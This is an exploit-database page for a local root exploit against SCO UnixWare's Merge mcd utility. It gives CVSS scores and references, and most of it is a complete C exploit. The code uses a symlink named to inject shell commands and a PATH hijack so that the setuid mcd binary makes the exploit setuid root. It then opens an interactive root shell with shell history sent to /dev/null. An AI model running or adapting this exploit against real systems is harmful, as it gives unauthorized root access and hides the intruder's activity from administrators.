SCO UnixWare Merge mcd Local Root Exploit

2009.04.01
Credit: gaaz
Risk: High
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* 04/2008: public release * I have'nt seen any advisory on this; possibly still not fixed. * * SCO UnixWare Merge mcd Local Root Exploit * By qaaz */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/stat.h> #define TARGET "/usr/lib/merge/mcd" #define DIR "/proc/%d/object", getpid() #define BIN "a.out" #define LNK "hrc;" BIN ";prc" #define DEV "/dev/cdrom/cdrom1" int main(int argc, char *argv[]) { char dir[4096], bin[4096]; char dev[4096], env[4096]; pid_t child; struct stat st; if (geteuid() == 0) { setuid(geteuid()); setgid(getegid()); if (strstr(argv[0], BIN)) { umask(0); chown(BIN, 0, 3); chmod(BIN, 06777); kill(getppid(), 15); return 0; } putenv("HISTFILE=/dev/null"); execl("/bin/sh", "sh", "-i", NULL); printf("[-] sh: %s\n", strerror(errno)); return 1; } printf("---------------------------------------\n"); printf(" UnixWare Merge mcd Local Root Exploit\n"); printf(" By qaaz\n"); printf("---------------------------------------\n"); if (access(TARGET, EX_OK) < 0) { printf("[-] %s: %s\n", TARGET, strerror(errno)); return 1; } if (symlink(DEV, LNK) < 0) { printf("[-] %s: %s\n", LNK, strerror(errno)); return 1; } sprintf(dir, DIR); sprintf(bin, "%s/%s", dir, BIN); snprintf(dev, sizeof(dev), "/dev/cdrom/../../%s/%s", getcwd(NULL, 4096), LNK); snprintf(env, sizeof(env), "PATH=.:%s", getenv("PATH")); if ((child = fork()) == 0) { chdir(dir); putenv(env); execl(TARGET, TARGET, "-u", "-d", dev, NULL); printf("[-] %s: %s\n", TARGET, strerror(errno)); return 1; } /*else if (child != -1) waitpid(child, NULL, 0);*/ printf("[*] Waiting for privs...\n"); while (stat(bin, &st) == 0) { if ((st.st_mode & 06777) == 06777) { printf("[+] Enjoy\n"); unlink(LNK); execl(bin, "woot", NULL); printf("[-] %s: %s\n", bin, strerror(errno)); return 1; } sleep(1); } printf("[-] %s: %s\n", bin, strerror(errno)); unlink(LNK); return 0; }

References:

http://www.securityfocus.com/bid/28625
http://www.osvdb.org/51234
http://www.milw0rm.com/exploits/5357
http://secunia.com/advisories/30921
ftp://ftp.sco.com/pub/unixware7/714/security/p534850/p534850.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top